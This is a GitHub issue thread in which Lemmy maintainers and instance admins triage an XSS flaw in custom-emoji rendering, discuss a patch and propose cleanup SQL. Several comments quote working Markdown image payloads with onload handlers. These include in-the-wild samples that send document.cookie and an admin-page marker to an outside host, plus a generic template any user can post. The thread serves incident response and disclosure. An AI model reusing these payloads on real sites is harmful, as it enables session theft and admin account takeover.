### ISSUE TITLE
Possible XSS attack

### ISSUE THREAD

**Issue by NomNuggetNom** [LemmyNet/lemmy-ui#1895]
### Requirements

- [X] This is a bug report, and if not, please post to https://lemmy.ml/c/lemmy_support instead.
- [X] Please [check](https://github.com/LemmyNet/lemmy-ui/issues) to see if this issue already exists.
- [X] It's a single bug. Do not report multiple bugs in one issue.
- [X] It's a frontend issue, not a backend issue; Otherwise please create an issue on the [backend repo](https://github.com/LemmyNet/lemmy) instead.

### Summary

~~The sidebar [dangerously sets HTML](https://github.com/LemmyNet/lemmy-ui/blob/main/src/shared/components/community/sidebar.tsx#L306C36-L306C36) but does not configure [the Markdown render](https://github.com/LemmyNet/lemmy-ui/blob/main/src/shared/markdown.ts#L22) to strip HTML codes. This enables simple XSS attacks like `<img onload="maliciousCodeHere()" />`. It seems like an attempt is made to [create a markdown renderer with HTML disabled](https://github.com/LemmyNet/lemmy-ui/blob/main/src/shared/markdown.ts#L157), however.~~

It now seems that this attack is done [via custom emojis](https://github.com/LemmyNet/lemmy-ui/pull/1897/files).

### Technical Details

`markdown-it` does some extremely simple guarding, but they don't claim to prevent XSS. Custom HTML should be removed in favor of plugins.

### Lemmy Instance Version

0.18.1

**Comment by geneccx** [comment]
The issue is not with the sidebar, but the markdown renderer.

**Comment by tgxn** [comment]
Also, this needs to be fixed on the backend, client-side validation is never enough. @geneccx - Where can I find the fix that you mention @makotech222 contributed on?

**Comment by geneccx** [comment]
> Also, this needs to be fixed on the backend, client-side validation is never enough. @geneccx - Where can I find the fix that you mention @makotech222 contributed on?

#1897

**Comment by calculuschild** [comment]
@NomNuggetNom please keep the issue open until it has been fixed.

**Comment by geneccx** [comment]
After implementing this fix, you will likely also need to invalidate all existing sessions (logging everyone out) due to https://github.com/LemmyNet/lemmy/issues/3499

**Comment by AlmightySnoo** [comment]
Both the sidebar and the legal information field don't seem to escape strings? The "Legal" page in lemmy.world is allowing malicious JavaScript to run right now.

**Comment by geneccx** [comment]
> Both the sidebar and the legal information field don't seem to escape strings? The "Legal" page in lemmy.world is allowing malicious JavaScript to run right now.

It's custom emoji rendered anywhere.

**Comment by AlmightySnoo** [comment]
> > Both the sidebar and the legal information field don't seem to escape strings? The "Legal" page in lemmy.world is allowing malicious JavaScript to run right now.
> 
> It's custom emoji rendered anywhere.

Both aren't exclusive, see the rendered HTML, the legal information field is also affected.

**Comment by arifwn** [comment]
> Rotate your JWT secret (invalidates all current login sessions)

Looks like you'll need to restart lemmy to make it uses the new secret.

**Comment by geneccx** [comment]
> > Rotate your JWT secret (invalidates all current login sessions)
> 
> Looks like you'll need to restart lemmy to make it uses the new secret.

Thanks, I'll add that to the list of steps.

**Comment by tgxn** [comment]
Repro:
1. add custom emoij
2. use it `![" onload="alert('test')"](https://lemmy.tgxn.net/pictrs/image/1672bfa2-5e6f-41ad-85cf-dc10071e6b25.png "test")`

**Comment by geneccx** [comment]
@tgxn teaching people how to exploit it in the wild probably isn't the best idea...

**Comment by tgxn** [comment]
> @tgxn teaching people how to exploit it in the wild probably isn't the best idea...

Sure, I'll delete the post; but it's not like malicious actors care, we know that it's specifically:
1. Custom Emoijs are being exploited.
2. Site admins removing custom emojis should remove this attack vector.

**Comment by geneccx** [comment]
> It was already being executed in the wild on some of the largest instances before this issue was created.

I am aware. The fix and mitigations came after discovering it being used in the wild. The point still stands, until more servers have had the chance to patch this up, and the Lemmy devs have had a chance to release the fix, sharing the specifics of how to execute the exploit can only cause more harm than good.

**Comment by StephenWetzel** [comment]
> ```sql
> UPDATE comment SET content = '<REMOVED BY ADMIN>' WHERE content LIKE '%![" onload%';
> UPDATE private_message SET content = '<REMOVED BY ADMIN>' WHERE content LIKE '%![" onload%';
> UPDATE post SET body = '<REMOVED BY ADMIN>' WHERE body LIKE '%![" onload%';
> UPDATE post SET name = '<REMOVED BY ADMIN>' WHERE name LIKE '%![" onload%';
> ```

Should these be `ILIKE` so the attackers can't just change the case and escape detection?

**Comment by stirante** [comment]
Maybe quick and easy way to fix it would be to either use https://www.npmjs.com/package/safe-marked or adapt current solution to use https://www.npmjs.com/package/dompurify

As always no user input can be trusted.

**Comment by Nutomic** [comment]
What makes you think that custom emojis are used as the attack vector? The fact is that emojis can only be set by local admins, and they dont federate. So I fail to see how an attack could set emojis, unless he already gained admin privileges through another attack vector.

**Comment by dcx** [comment]
> What makes you think that custom emojis are used as the attack vector? The fact is that emojis can only be set by local admins, and they dont federate. So I fail to see how an attack could set emojis, unless he already gained admin privileges through another attack vector.

I'm doing some triage right now. I'm not sure if I fully understand this yet, but this is in my instance's database. Which means I believe it will be injected if our users click into the infected discussion.

![image](https://github.com/LemmyNet/lemmy-ui/assets/502666/66f0236f-7eb6-4862-8c67-24e36150d5a3)

**Comment by abhibeckert** [comment]
> I think this means it will be injected if our users click into the infected discussion?

Anyone has viewed a page where that `onload` code executes will have their login token sent to a third party server. Allowing whoever runs that server to impersonate them.

If you haven't already, you should take your instance offline until this has been sorted out.

**Comment by sunaurus** [comment]
Those comments from the screenshot are all from lemmy.world, so they would not have any effect on the poster's instance. Or @abhibeckert are you aware of an additional vulnerability other than what has been discussed here?

**Comment by SheriffJake** [comment]
> 
> I'm doing some triage right now. I'm not sure if I fully understand this yet, but this is in my instance's database. _I think_ this means it will be injected if our users click into the infected discussion?
> 
> ![image](https://user-images.githubusercontent.com/502666/252295989-66f0236f-7eb6-4862-8c67-24e36150d5a3.png)


That code resolves to a url: `https://zelensky[.zip]/save/navAdmin`
Virustotal has so far only one detection with it, but that might change soon:
https://www.virustotal.com/gui/url/c2bb82f2bd01786c16f4425544e9d5d080fe3302fa139eb67ad1744890f95e4f?nocache=1

**Comment by dcx** [comment]
As a precaution, I've run the measures suggested by @geneccx above (thanks!) and disabled federation for now. I've provided full list of ten for convenience.

Hmm. This is not important for me personally now, but I still don't yet understand how this doesn't affect users who view the "infected" comment on the federated post (via my local instance). Here is what the code does, broken up:

![image](https://github.com/LemmyNet/lemmy-ui/assets/502666/8e950325-44c0-4e57-9211-2c76abe6cafb)

Which translates to:

![image](https://github.com/LemmyNet/lemmy-ui/assets/502666/7cd09eae-a8b0-4c54-9919-fce8721f475b)

I assume by the developers' comments that these must be escaped in some way when federated across.

```
 ![" onload="fetch(String.fromCharCode(104,116,116,112,115,58,47,47,122,101,108,101,110,115,107,121,46,122,105,112,47,115,97,118,101,47)+btoa(document.cookie+(document.getElementById(String.fromCharCode(110,97,118,65,100,109,105,110))||{id:String.fromCharCode()}).id))"](https://lemmy.world/pictrs/image/66ca36df-4ada-47b3-9169-01870d8fb0ac.png "lw")
 ![" onload="fetch(String.fromCharCode(104,116,116,112,115,58,47,47,122,101,108,101,110,115,107,121,46,122,105,112,47,115,97,118,101,47)+btoa(document.cookie+(document.getElementById(String.fromCharCode(110,97,118,65,100,109,105,110))||{id:String.fromCharCode()}).id))"](https://lemmy.world/pictrs/image/66ca36df-4ada-47b3-9169-01870d8fb0ac.png "lw") 
 ![" onload="fetch(String.fromCharCode(104,116,116,112,115,58,47,47,122,101,108,101,110,115,107,121,46,122,105,112,47,115,97,118,101,47)+btoa(document.cookie+(dString.fromCharCode()}).id))"](https://lemmy.world/pictrs/image/66ca36df-4ada-47b3-9169-01870d8fb0ac.png "lw") 
 ![" onload="fetch(String.fromCharCode(104,116,116,112,115,58,47,47,122,101,108,101,110,115,107,121,46,122,105,112,47,115,97,118,101,47)+btoa(document.cookie+(document.getElementById(String.fromCharCode(110,97,118,65,100,109,105,110))||{id:String.fromCharCode()}).id))"](https://lemmy.world/pictrs/image/66ca36df-4ada-47b3-9169-01870d8fb0ac.png "lw") 
 ![" onload="fetch(String.fromCharCode(104,116,116,112,115,58,47,47,122,101,108,101,110,115,107,121,46,122,105,112,47,115,97,118,101,47)+btoa(document.cookie+(document.getElementById(String.fromCharCode(110,97,118,65,100,109,105,110))||{id:String.fromCharCode()}).id))"](https://lemmy.world/pictrs/image/66ca36df-4ada-47b3-9169-01870d8fb0ac.png "lw") 
 ![" onload="fetch(String.fromCharCode(104,116,116,112,115,58,47,47,122,101,108,101,110,115,107,121,46,122,105,112,47,115,97,118,101,47)+btoa(document.cookie+(document.getElementById(String.fromCharCode(110,97,118,65,100,109,105,110))||{id:String.fromCharCode()}).id))"](https://lemmy.world/pictrs/image/66ca36df-4ada-47b3-9169-01870d8fb0ac.png "lw") 
 ![" onload="window.location.href = 'https://aussie.zone/pictrs/image/b3b2854b-b9f5-4185-9375-2d62901556de.jpeg'"](https://aussie.zone/pictrs/image/b3b2854b-b9f5-4185-9375-2d62901556de.jpeg "1w") 
 ![" onload="fetch(String.fromCharCode(104,116,116,112,115,58,47,47,122,101,108,101,110,115,107,121,46,122,105,112,47,115,97,118,101,47)+document.cookie)"](https://lemmy.world/pictrs/image/66ca36df-4ada-47b3-9169-01870d8fb0ac.png "lw") 
 ![" onload="fetch(String.fromCharCode(104,116,116,112,115,58,47,47,122,101,108,101,110,115,107,121,46,122,105,112,47,115,97,118,101,47)+btoa(document.cookie+(document.getElementById(String.fromCharCode(110,97,118,65,100,109,105,110))||{id:String.fromCharCode()}).id))"](https://lemmy.world/pictrs/image/66ca36df-4ada-47b3-9169-01870d8fb0ac.png "lw") 
 ![" onload="fetch(String.fromCharCode(104,116,116,112,115,58,47,47,122,101,108,101,110,115,107,121,46,122,105,112,47,108,111,108,47)+btoa(document.cookie+(document.getElementById(String.fromCharCode(110,97,118,65,100,109,105,110))||{id:String.fromCharCode()}).id))"](https://forum.basedcount.com/pictrs/image/fe5f2ffd-baea-4037-a8b7-71597a5694d5.png "tradwife") 
```

**Comment by finnim** [comment]
Can someone please confirm if instances without custom emoji are unaffected?

**Comment by DarkIrata** [comment]
How does blacklisted words get handled when federated? It could be a **workaround** to blacklist 'onload' as a word. Tested on my own instance with private messages, it did filtere it and prevented execution.

**Comment by NettoHikari** [comment]
> Can someone please confirm if instances without custom emoji are unaffected?

I never had any custom emjos. I reacted pretty quickly right after I woke up, took my instance offline and patched it with the aforementioned patch in the PR by Makotech222.

So far, nothing has happened to my instance (before and after the patch).

**Comment by BxOxSxS** [comment]
> > I'm doing some triage right now. I'm not sure if I fully understand this yet, but this is in my instance's database. _I think_ this means it will be injected if our users click into the infected discussion?
> > ![image](https://user-images.githubusercontent.com/502666/252295989-66f0236f-7eb6-4862-8c67-24e36150d5a3.png)
> 
> That code resolves to a url: `https://zelensky[.zip]/save/navAdmin` Virustotal has so far only one detection with it, but that might change soon: https://www.virustotal.com/gui/url/c2bb82f2bd01786c16f4425544e9d5d080fe3302fa139eb67ad1744890f95e4f?nocache=1

You are wrong about the url. The code fetch url `https://zelensky.[zip]/save/{x}`, where x is encoded base64 string of cookies (`document.cookie`) and id of html element `navAdmin`. Only admins have such element (on the navigation bar) so for regular users it will be null. This way attacker quicky gets information if the stolen cookie belongs to an admin

**Comment by AlmightySnoo** [comment]
> > Can someone please confirm if instances without custom emoji are unaffected?
> 
> I never had any custom emjos. I reacted pretty quickly right after I woke up, took my instance offline and patched it with the aforementioned patch in the PR by Makotech222.
> 
> So far, nothing has happened to my instance (before and after the patch).

I don't think that's a good idea, what if people simply want to discuss "onload" in a Javascript or HTML community?

**Comment by AlmightySnoo** [comment]
> Those comments from the screenshot are all from lemmy.world, so they would not have any effect on the poster's instance. Or @abhibeckert are you aware of an additional vulnerability other than what has been discussed here?

Other instances like beehaw.org were also affected. Also, the comments are not only from lemmy.world, check (disable Javascript to be safe and load in a private browsing window) https://lemmy.blahaj.zone/search?q=onload%3D&type=All&listingType=All&page=1&sort=TopAll 

There's in particular a compromised comment by 2pac@forum.basedcount.com over there. And the JavaScript that they're trying to inject is trying to steal admin cookies, and given how Lemmy.world's admin MichelleG got her account stolen, and it also happened to beehaw.org and lemmy.blahaj.zone, that means that those custom emojis in the federated comments are likely to be the XSS vectors. It remains to see where exactly in lemmy-ui those comments aren't escaped properly.

**Comment by db0** [comment]
Beehaw wasn't affected from what I know. They just went dark out of an abundance of caution

**Comment by DarkIrata** [comment]
> ###
> **[AlmightySnoo](/AlmightySnoo) ** commented [Jul 10, 2023](#issuecomment-1628986216) •

i know, thats why i said workaround. It would be more than just waiting for an update and gettting users cookies snatched in the time. If everyone disbles federation for the time, the whole point of lemmy is more or less lost for the time.

**Comment by geneccx** [comment]
No, malicious comments need to be specific to the instance's custom emoji for the exploit to work.

From my testing and observations, federated comments do not trigger the issue.

**Comment by AlmightySnoo** [comment]
>     2. Overwrite content with the exploit
> 
> 
> ```sql
> UPDATE comment SET content = '<REMOVED BY ADMIN>' WHERE content LIKE '%![" onload%';
> UPDATE private_message SET content = '<REMOVED BY ADMIN>' WHERE content LIKE '%![" onload%';
> UPDATE post SET body = '<REMOVED BY ADMIN>' WHERE body LIKE '%![" onload%';
> UPDATE post SET name = '<REMOVED BY ADMIN>' WHERE name LIKE '%![" onload%';
> ```

Just to be cautious, I'd also do the same with `onerror` with something like `'%![%](" onerror%'` as the following is also a possible exploit:

```<img src="" onerror="something()">```

as `onerror` will be triggered because the `src` attribute is empty.

I'd also do the same without a space between onload/onerror and the first quotation mark.

**Comment by kevincox** [comment]
This is still incomplete. You could add two spaces instead of one and bypass that pattern. It is also one-time only. The only true fix is to push out an updated UI.

**Comment by geneccx** [comment]
Yep, there's no way to identify all possible cases where this is done.

Update the frontend - the fix is available in [0.18.2-rc.1](https://github.com/LemmyNet/lemmy-ui/releases/tag/0.18.2-rc.1).

Deleting the comments/posts is not technically necessary, it's more for cleanup afterwards anyway.

**Comment by FireMasterK** [comment]
> Just to be cautious, I'd also do the same with `onerror` with something like `'%![%](" onerror%'` as the following is also a possible XSS:
> 
> `<img src="" onerror="something()">`
> 
> as `onerror` will be triggered because the `src` attribute is empty.
> 
> I'd also do the same without a space between onload/onerror and the first quotation mark.

That wouldn't be sufficient in my opinion, you could potentially inject a `<script>` tag altogether. There are so many ways to perform an XSS attack with the current attack vector.

**Comment by AlmightySnoo** [comment]
> > Just to be cautious, I'd also do the same with `onerror` with something like `'%![%](" onerror%'` as the following is also a possible XSS:
> > `<img src="" onerror="something()">`
> > as `onerror` will be triggered because the `src` attribute is empty.
> > I'd also do the same without a space between onload/onerror and the first quotation mark.
> 
> That wouldn't be sufficient in my opinion, you could potentially inject a `<script>` tag altogether. There are so many ways to perform an XSS attack with the current attack vector.

Which means, as long as there isn't a proper fix to this, we still don't know whether instances currently host other malicious JavaScript code that is active and discretely stealing cookies. We just know that we got rid of the onload's.

**Comment by sunaurus** [comment]
Just so we're all on the same page: the current fix wasn't getting rid of onloads, it was actually disabling the custom rendering logic for emojis.

For now, the only known way to actually run this code was through custom emojis (before 0.18.2-rc.1). We can speculate that there are other XSS vulnerabilities, but there are no known ones at the moment.

**Comment by AlmightySnoo** [comment]
I just checked again in the `forum.basedcount.com` instance which is running the  0.18.1 backend, and Markdown in the comments isn't properly escaped.

It is very curious however. The exploit requires a title that is exactly the name of any custom emoji (not necessarily compromised!) in the Markdown image to work, without a title it doesn't work. For instance, putting this in a comment successfully injects the JavaScript:

```
![" onload="alert('pwned')"](any_image_url "name of a custom emoji, like tradwife or emily on the instance above") 
```

but this won't work:


```
![" onload="alert('pwned')"](any_image_url) 
```

 Thus, a simple user without any admin rights can perfectly perform the exploit and attempt to steal admin cookies, so it's wrong to assume that it's exclusively a compromised custom emoji that is allowing the hack.

**Comment by geneccx** [comment]
@AlmightySnoo https://github.com/LemmyNet/lemmy-ui/issues/1895#issuecomment-1628372812

It's **usage** of a local custom emoji by any user that triggers the exploit, and the PR fixes the usage piece such that normal users cannot inject arbitrary JS by using local custom emoji. Admins however, can still place arbitrary JS when creating an emoji.

The existing PR fixes the current issue that is being exploited in the wild.

**Comment by sunaurus** [comment]
> it's wrong to assume that it's exclusively a compromised custom emoji that is allowing the hack.

This is not being assumed, it is known that any emoji will trigger the vulnerable emoji rendering code. This is exactly what is fixed in 0.18.2-rc.1, by the way.

**Comment by geneccx** [comment]
Sure, but who's assuming that?

There's movement now in other areas, including adding a CSP, potentially revisiting the JWT implementation, among others.

There are going to be other exploits, that is inevitable. Focus is better directed towards layers of defence rather than speculation.

**Comment by abhibeckert** [comment]
@sunaurus I think it would be good to learn from this and add some automated method to quickly deploy urgent security patches. There are thousands of lemmy instances and it will take forever for all of them to update.

I'm not suggesting fully automated software updates, just some way to quickly patch a critical vulnerability like this one.

**Comment by rcmaehl** [comment]
> @sunaurus I think it would be good to learn from this and add some automated method to quickly deploy urgent security patches. There are thousands of lemmy instances and it will take forever for all of them to update.
> 
> I'm not suggesting fully automated software updates, just some way to quickly patch a critical vulnerability like this one.

Maybe with an opt-in/opt-out option because I'm sure some admins will be up in arms about the potential abuse.

**Comment by ornato-t** [comment]
Hey everyone, admin of `forum.basedcount.com` here. Sorry in advance for the trouble that this is giving to you. I'll go ahead and update my instance to the latest rc, as well as follow all the tips in this instance.

**Comment by finnim** [comment]
> Maybe with an opt-in/opt-out option because I'm sure some very specific admins will be up in arms about the potential abuse.

I would definitely welcome an API endpoint controlled by a few trusted instance admins that could be polled every minute or so with a very simple GET request.

In the case of a security issue that requires immediate attention by an admin or sysadmin I would have my server shutdown or stop all containers if it receives a certain agreed-upon response.

This is the only way we can have small instances run by few people who might be asleep without them becoming attack vectors.

Worst case it's a false positive and my instance goes down, but I rather have this than compromise any user data.

**Comment by SexyVetra** [comment]
> an API endpoint controlled by a few trusted instance admins

I think you meant to propose checking for GitHub for new releases instead of adding a new points of failure and additional vulnerability surfaces

**Comment by grahhnt** [comment]
For future reference, this was patched by commit e80bcf53acb8ce25ed5ef6b7eb16b90f0b07e8f1 and became available in version `v0.18.2-rc.1`

**Comment by abhibeckert** [comment]
> > @sunaurus I think it would be good to learn from this and add some automated method to quickly deploy urgent security patches. There are thousands of lemmy instances and it will take forever for all of them to update.
> > I'm not suggesting fully automated software updates, just some way to quickly patch a critical vulnerability like this one.
> 
> Maybe with an opt-in/opt-out option because I'm sure some very specific admins will be up in arms about the potential abuse.

Sure... that option needs to exist, but it maybe don't make it too easy?

Automatically applying security patches is standard practice and the potential for abuse by a rogue Lemmy developer is vastly smaller than the potential abuse from a delayed installation.

Personally I think if an instance hasn't updated to v0.18.2.rc.1 within several hours they should be defederated until they apply the patch. If instance admins want to, you know, sleep, then these patches need to be automated.

**Comment by kevincox** [comment]
What would defederation accomplish? The patch is in the client, patched servers can still send messages that trigger the bug. The problem is that the UI renders it insecurely.

Let's not get too excited. I think that there should be a designated channel for vulnerability announcements but I don't think we need to jump straight to automatically installing new code on servers. Without very careful design that can add worse vulnerabilities than it would prevent.

**Comment by abhibeckert** [comment]
> The patch is in the client, patched servers can still send messages that trigger the bug.

Admin and moderator accounts have been accessed on some of those servers. Login tokens for any (all?) other users may have also been compromised. And they have been posting links to illegal content.

The patch doesn't reset those JWT tokens either. So while the barn door is closed once instances update the wolf could be locked inside with the chickens.

**Comment by fkrauthan** [comment]
Also why should anyone install an RC version? Please release an official patch version. No one should have to install an RC to patch a bug.

**Comment by SineSwiper** [comment]
> For future reference, this was patched by commit [e80bcf5](https://github.com/LemmyNet/lemmy-ui/commit/e80bcf53acb8ce25ed5ef6b7eb16b90f0b07e8f1) and became available in version `v0.18.2-rc.1`

This is a serious enough issue to backport this to an official version.

**Comment by dessalines** [comment]
We plan on doing a release with a fix tomorrow, please be patient.

**Comment by geneccx** [comment]
> We plan on doing a release with a fix tomorrow, please be patient.

@dessalines If it's not already on your radar, please also consider posting a [Github security advisory](https://docs.github.com/en/code-security/security-advisories/repository-security-advisories/creating-a-repository-security-advisory) on the issue for visibility.
